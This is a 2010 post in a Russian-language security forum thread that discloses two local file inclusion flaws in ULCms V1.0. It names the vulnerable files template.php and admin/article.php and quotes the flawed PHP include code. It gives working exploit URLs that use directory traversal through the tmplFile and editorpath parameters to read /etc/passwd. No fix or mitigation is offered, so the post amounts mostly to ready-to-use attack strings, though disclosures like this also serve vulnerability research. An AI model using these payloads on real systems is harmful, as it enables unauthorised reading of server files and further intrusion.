Регистрация Поиск Сообщения за день Все разделы прочитаны
Вернуться   RDot: White Hat Security Community > Penetration Testing > Web-среда/Web-applications > Сценарии/CMF/СMS
Перезагрузить страницу ULCms

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 07.07.2010, 15:54   #1
Atra Pluvia
 
Регистрация: 07.07.2010
Сообщений: 21
Репутация: 53
По умолчанию ULCms
ULCms V1.0
Download: http://code.google.com/p/ulcms/

LFI(rg==on):

Уязвимый файл:
./template/template.php

Код:
PHP код:
<?php
if ( !isset($tmplFile) ) {
    $templateFile BASE.$templateDir.$settingInfo['backEndTemplateName']."/".PHP_SCRIPT."";
} else {
        $templateFile BASE.$templateDir.$settingInfo['backEndTemplateName']."/".$tmplFile;    
}
//debugVar($templateFile);
if ( !file_exists($templateFile) ) {
    die("Module files: $templateFile not existedЈЎ<br>Session halted.");
} else {
    include_once($templateFile);
}
?>
Эксплуатация:
./template/template.php?tmplFile=../../../../../../../../../etc/passwd

LFI(rg==on):

Уязвимый файл:
./template/admin/article.php

Эксплуатация:
./template/admin/article.php?editorpath=../../../../../../../../../../../../../../../etc/passwd
Последний раз редактировалось (dm); 19.08.2010 в 01:31.. Причина: изменение заголовка
Atra Pluvia вне форума   Ответить с цитированием
Ответ

Метки
lfi

« Предыдущая тема | Следующая тема »
Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Линейный вид Линейный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot


Обратная связь - Архив - Вверх